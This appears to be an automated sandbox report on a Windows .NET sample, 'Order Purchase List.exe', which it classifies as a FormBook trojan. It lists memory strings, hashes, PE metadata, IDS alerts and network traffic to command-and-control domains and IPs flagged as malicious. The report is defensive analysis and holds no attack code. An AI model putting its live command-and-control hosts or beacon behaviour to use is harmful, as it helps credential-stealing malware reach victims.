http://www.tiro.comn	Order Purchase List.exe, 00000000.00000003.272981556.00000000063FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.auxiliacapitalpartnersllc.com/wp-login.php	NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/;-	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnA	Order Purchase List.exe, 00000000.00000003.274272697.000000000641D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	Order Purchase List.exe, 00000000.00000003.273028337.00000000063FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Kal1	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	Order Purchase List.exe, 00000000.00000003.277778999.00000000063ED000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cnH$N	Order Purchase List.exe, 00000000.00000003.274272697.000000000641D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micr	explorer.exe, 0000000C.00000000.361157052.000000000EE50000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Verd	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersU	Order Purchase List.exe, 00000000.00000003.277526176.00000000063E9000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/ito	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	Order Purchase List.exe, 00000000.00000003.272701872.00000000063FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/images/fa	NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/	Order Purchase List.exe, 00000000.00000003.274443384.00000000063E4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/9	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com?	Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	Order Purchase List.exe, 00000000.00000003.274340079.000000000641D000.00000004.00000001.sdmp, Order Purchase List.exe, 00000000.00000003.274272697.000000000641D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers#:?$	Order Purchase List.exe, 00000000.00000003.277526176.00000000063E9000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.krlea	Order Purchase List.exe, 00000000.00000003.273760229.00000000063E6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com:	Order Purchase List.exe, 00000000.00000003.272981556.00000000063FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/e-c$	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.comWe	Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/4-2$	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://en.w5	Order Purchase List.exe, 00000000.00000003.272440740.00000000017CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.kr	Order Purchase List.exe, 00000000.00000003.273760229.00000000063E6000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/commo	NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.comnfB	Order Purchase List.exe, 00000000.00000003.272795340.00000000063FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.krC	Order Purchase List.exe, 00000000.00000003.273760229.00000000063E6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com-u	Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/mad_desig	NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
154.23.204.56	bigbigsea.com	United States	174	COGENT-174US	true
104.21.44.253	www.hottorchlighter.com	United States	13335	CLOUDFLARENETUS	true
68.178.221.206	auxiliacapitalpartnersllc.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
34.102.136.180	inatividigitali.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	499414
Start date:	08.10.2021
Start time:	11:21:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Order Purchase List.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@6/4
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 47.3% (good quality ratio 42.8%) Quality average: 70.4% Quality standard deviation: 32.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 62 Number of non-executed functions: 138
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 184.28.84.57, 20.82.210.154, 20.54.110.249, 40.112.88.60, 52.251.79.25, 2.20.178.10, 2.20.178.56, 104.70.141.242, 20.199.120.182, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.199.120.85 Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:22:58	API Interceptor	1x Sleep call for process: Order Purchase List.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.hottorchlighter.com	ORDER REMINDER_0000200.gz.exe	Get hash	malicious	Browse	104.21.44.253

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	xiaomi-home.apk	Get hash	malicious	Browse	172.67.29.206
	8205108.exe	Get hash	malicious	Browse	104.21.71.3
	canon-camera-connect.apk	Get hash	malicious	Browse	172.67.29.206
	dAZVcn7rdL.exe	Get hash	malicious	Browse	162.159.130.233
	MV ROCKET_PDA.exe	Get hash	malicious	Browse	23.227.38.74
	p6mAnWwqsi.exe	Get hash	malicious	Browse	172.67.176.216
	25678023400.exe	Get hash	malicious	Browse	172.67.188.154
	WcInstaller.exe	Get hash	malicious	Browse	104.18.88.101
	Invoice Payment.exe	Get hash	malicious	Browse	162.159.134.233
	hvgaT5RrRd.exe	Get hash	malicious	Browse	172.67.176.216
	40rsuPoRyW.exe	Get hash	malicious	Browse	172.67.178.31
	s0JV4f4mDk.exe	Get hash	malicious	Browse	23.227.38.74
	7R6UAiH7HK.exe	Get hash	malicious	Browse	104.21.17.146
	lKJ1dcPs57.exe	Get hash	malicious	Browse	104.21.17.146
	Se adjunta estado de cuenta.exe	Get hash	malicious	Browse	162.159.135.233
	DuUHs3RnIi.exe	Get hash	malicious	Browse	172.67.188.154
	w3ckECsT7j.exe	Get hash	malicious	Browse	104.21.19.200
	u4vXf6jibw.exe	Get hash	malicious	Browse	162.159.133.233
	csrss.exe	Get hash	malicious	Browse	172.67.161.225
	csrss.exe	Get hash	malicious	Browse	104.21.57.251
COGENT-174US	arm-20211007-1618	Get hash	malicious	Browse	206.62.57.76
	arm7-20211007-1547	Get hash	malicious	Browse	38.54.7.79
	3mnJEPCGfk	Get hash	malicious	Browse	206.185.255.169
	e7HWBo7yQM	Get hash	malicious	Browse	38.184.96.225
	yR25n6pfMS	Get hash	malicious	Browse	38.36.204.184
	GaSBpMyVub	Get hash	malicious	Browse	206.238.247.7
	3DAMhv0DFI	Get hash	malicious	Browse	38.223.141.56
	x86-20211004-1530	Get hash	malicious	Browse	149.33.222.117
	INVOICE.PDF.exe	Get hash	malicious	Browse	154.23.113.150
	FX8w3rI5cw	Get hash	malicious	Browse	23.154.10.221
	yir8ieZzXL	Get hash	malicious	Browse	38.112.246.43
	rf8Mq00YCl.dll	Get hash	malicious	Browse	38.138.157.13
	UpsxN0u4wi	Get hash	malicious	Browse	149.121.191.34
	nMftbNUfgt	Get hash	malicious	Browse	154.56.6.75
	cu8KB5if2T	Get hash	malicious	Browse	149.30.6.159
	8qv45JJrGQ	Get hash	malicious	Browse	167.141.166.177
	lessie.arm7	Get hash	malicious	Browse	38.178.181.67
	lessie.x86	Get hash	malicious	Browse	154.36.163.116
	lessie.arm	Get hash	malicious	Browse	38.181.134.221
	sora.arm	Get hash	malicious	Browse	38.192.146.91

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order Purchase List.exe.log Download File
Process:	C:\Users\user\Desktop\Order Purchase List.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.611950413314092
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Order Purchase List.exe
File size:	1104896
MD5:	903febb63c1a5afa29741401eac430af
SHA1:	3b6d8067630bc891b469ad5d367880e602aaa6a8
SHA256:	4a32f26bf573c5407014a41c8c54f84afa0041cce8c2b65f147527608cb23598
SHA512:	74f62f8d1335fa6672494f355e03b707a1125c6fa82f57855adca406ea41a0e0824ea3f650dbc489a274fad8be681747e5edfd68738d46278c2d117b611792b7
SSDEEP:	24576:NbbhXZw6yA9XU1RsTvgmZqsBHrB22w2XZw6yA9XU:5bvw09XTvksBHmUw09X
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q]a..............P.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	395838eccc86c4f8

Static PE Info

General
Entrypoint:	0x50eeaa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x615D71FC [Wed Oct 6 09:53:00 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10ee58	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x110000	0x760	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x112000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x10ceb0	0x10d000	False	0.808625515509	PGP symmetric key encrypted data - Plaintext or unencrypted data	7.614432754	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x110000	0x760	0x800	False	0.38720703125	data	3.77611216307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x112000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x110100	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x110238	0x14	data
RT_VERSION	0x11025c	0x304	data
RT_MANIFEST	0x110570	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2015
Assembly Version	1.0.0.0
InternalName	53z.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	VidyaGame
ProductVersion	1.0.0.0
FileDescription	VidyaGame
OriginalFilename	53z.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/08/21-11:24:18.630425	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49829	80	192.168.2.3	34.102.136.180
10/08/21-11:24:18.630425	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49829	80	192.168.2.3	34.102.136.180
10/08/21-11:24:18.630425	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49829	80	192.168.2.3	34.102.136.180
10/08/21-11:24:18.744804	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49829	34.102.136.180	192.168.2.3
10/08/21-11:24:23.978735	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.2.3	68.178.221.206
10/08/21-11:24:23.978735	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.2.3	68.178.221.206
10/08/21-11:24:23.978735	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49830	80	192.168.2.3	68.178.221.206

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2021 11:24:18.613635063 CEST	49829	80	192.168.2.3	34.102.136.180
Oct 8, 2021 11:24:18.629820108 CEST	80	49829	34.102.136.180	192.168.2.3
Oct 8, 2021 11:24:18.630399942 CEST	49829	80	192.168.2.3	34.102.136.180
Oct 8, 2021 11:24:18.630424976 CEST	49829	80	192.168.2.3	34.102.136.180
Oct 8, 2021 11:24:18.646550894 CEST	80	49829	34.102.136.180	192.168.2.3
Oct 8, 2021 11:24:18.744803905 CEST	80	49829	34.102.136.180	192.168.2.3
Oct 8, 2021 11:24:18.744865894 CEST	80	49829	34.102.136.180	192.168.2.3
Oct 8, 2021 11:24:18.745285988 CEST	49829	80	192.168.2.3	34.102.136.180
Oct 8, 2021 11:24:18.745321989 CEST	49829	80	192.168.2.3	34.102.136.180
Oct 8, 2021 11:24:18.763252020 CEST	80	49829	34.102.136.180	192.168.2.3
Oct 8, 2021 11:24:23.787813902 CEST	49830	80	192.168.2.3	68.178.221.206
Oct 8, 2021 11:24:23.978451014 CEST	80	49830	68.178.221.206	192.168.2.3
Oct 8, 2021 11:24:23.978662968 CEST	49830	80	192.168.2.3	68.178.221.206
Oct 8, 2021 11:24:23.978734970 CEST	49830	80	192.168.2.3	68.178.221.206
Oct 8, 2021 11:24:24.169179916 CEST	80	49830	68.178.221.206	192.168.2.3
Oct 8, 2021 11:24:24.225665092 CEST	80	49830	68.178.221.206	192.168.2.3
Oct 8, 2021 11:24:24.225699902 CEST	80	49830	68.178.221.206	192.168.2.3
Oct 8, 2021 11:24:24.225713015 CEST	80	49830	68.178.221.206	192.168.2.3
Oct 8, 2021 11:24:24.225730896 CEST	80	49830	68.178.221.206	192.168.2.3
Oct 8, 2021 11:24:24.226089001 CEST	49830	80	192.168.2.3	68.178.221.206
Oct 8, 2021 11:24:24.226253033 CEST	49830	80	192.168.2.3	68.178.221.206
Oct 8, 2021 11:24:24.420070887 CEST	80	49830	68.178.221.206	192.168.2.3
Oct 8, 2021 11:24:29.278954983 CEST	49831	80	192.168.2.3	104.21.44.253
Oct 8, 2021 11:24:29.295092106 CEST	80	49831	104.21.44.253	192.168.2.3
Oct 8, 2021 11:24:29.295653105 CEST	49831	80	192.168.2.3	104.21.44.253
Oct 8, 2021 11:24:29.295742035 CEST	49831	80	192.168.2.3	104.21.44.253
Oct 8, 2021 11:24:29.311770916 CEST	80	49831	104.21.44.253	192.168.2.3
Oct 8, 2021 11:24:29.325709105 CEST	80	49831	104.21.44.253	192.168.2.3
Oct 8, 2021 11:24:29.325743914 CEST	80	49831	104.21.44.253	192.168.2.3
Oct 8, 2021 11:24:29.326071024 CEST	49831	80	192.168.2.3	104.21.44.253
Oct 8, 2021 11:24:29.326109886 CEST	49831	80	192.168.2.3	104.21.44.253
Oct 8, 2021 11:24:29.342273951 CEST	80	49831	104.21.44.253	192.168.2.3
Oct 8, 2021 11:24:34.406539917 CEST	49833	80	192.168.2.3	154.23.204.56
Oct 8, 2021 11:24:34.571924925 CEST	80	49833	154.23.204.56	192.168.2.3
Oct 8, 2021 11:24:34.572078943 CEST	49833	80	192.168.2.3	154.23.204.56
Oct 8, 2021 11:24:34.572302103 CEST	49833	80	192.168.2.3	154.23.204.56
Oct 8, 2021 11:24:34.737538099 CEST	80	49833	154.23.204.56	192.168.2.3
Oct 8, 2021 11:24:34.738827944 CEST	80	49833	154.23.204.56	192.168.2.3
Oct 8, 2021 11:24:34.738842010 CEST	80	49833	154.23.204.56	192.168.2.3
Oct 8, 2021 11:24:34.739249945 CEST	49833	80	192.168.2.3	154.23.204.56
Oct 8, 2021 11:24:34.739288092 CEST	49833	80	192.168.2.3	154.23.204.56
Oct 8, 2021 11:24:34.904603004 CEST	80	49833	154.23.204.56	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2021 11:24:18.565685034 CEST	51539	53	192.168.2.3	8.8.8.8
Oct 8, 2021 11:24:18.588309050 CEST	53	51539	8.8.8.8	192.168.2.3
Oct 8, 2021 11:24:23.755902052 CEST	55393	53	192.168.2.3	8.8.8.8
Oct 8, 2021 11:24:23.786691904 CEST	53	55393	8.8.8.8	192.168.2.3
Oct 8, 2021 11:24:29.246157885 CEST	50585	53	192.168.2.3	8.8.8.8
Oct 8, 2021 11:24:29.276962996 CEST	53	50585	8.8.8.8	192.168.2.3
Oct 8, 2021 11:24:34.370162010 CEST	58540	53	192.168.2.3	8.8.8.8
Oct 8, 2021 11:24:34.403768063 CEST	53	58540	8.8.8.8	192.168.2.3
Oct 8, 2021 11:24:39.758687973 CEST	55108	53	192.168.2.3	8.8.8.8
Oct 8, 2021 11:24:39.799196959 CEST	53	55108	8.8.8.8	192.168.2.3
Oct 8, 2021 11:24:50.642997026 CEST	58942	53	192.168.2.3	8.8.8.8
Oct 8, 2021 11:24:50.715248108 CEST	53	58942	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 8, 2021 11:24:18.565685034 CEST	192.168.2.3	8.8.8.8	0x1362	Standard query (0)	www.inatividigitali.com	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:23.755902052 CEST	192.168.2.3	8.8.8.8	0x4eb6	Standard query (0)	www.auxiliacapitalpartnersllc.com	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:29.246157885 CEST	192.168.2.3	8.8.8.8	0xc0f7	Standard query (0)	www.hottorchlighter.com	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:34.370162010 CEST	192.168.2.3	8.8.8.8	0x794c	Standard query (0)	www.bigbigsea.com	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:39.758687973 CEST	192.168.2.3	8.8.8.8	0x1a9f	Standard query (0)	www.greatamericanlandworks.com	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:50.642997026 CEST	192.168.2.3	8.8.8.8	0xee59	Standard query (0)	www.iphone13promax.show	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 8, 2021 11:24:18.588309050 CEST	8.8.8.8	192.168.2.3	0x1362	No error (0)	www.inatividigitali.com	inatividigitali.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 11:24:18.588309050 CEST	8.8.8.8	192.168.2.3	0x1362	No error (0)	inatividigitali.com		34.102.136.180	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:23.786691904 CEST	8.8.8.8	192.168.2.3	0x4eb6	No error (0)	www.auxiliacapitalpartnersllc.com	auxiliacapitalpartnersllc.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 11:24:23.786691904 CEST	8.8.8.8	192.168.2.3	0x4eb6	No error (0)	auxiliacapitalpartnersllc.com		68.178.221.206	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:29.276962996 CEST	8.8.8.8	192.168.2.3	0xc0f7	No error (0)	www.hottorchlighter.com		104.21.44.253	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:29.276962996 CEST	8.8.8.8	192.168.2.3	0xc0f7	No error (0)	www.hottorchlighter.com		172.67.206.214	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:34.403768063 CEST	8.8.8.8	192.168.2.3	0x794c	No error (0)	www.bigbigsea.com	bigbigsea.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 11:24:34.403768063 CEST	8.8.8.8	192.168.2.3	0x794c	No error (0)	bigbigsea.com		154.23.204.56	A (IP address)	IN (0x0001)
Oct 8, 2021 11:24:39.799196959 CEST	8.8.8.8	192.168.2.3	0x1a9f	Name error (3)	www.greatamericanlandworks.com	none	none	A (IP address)	IN (0x0001)
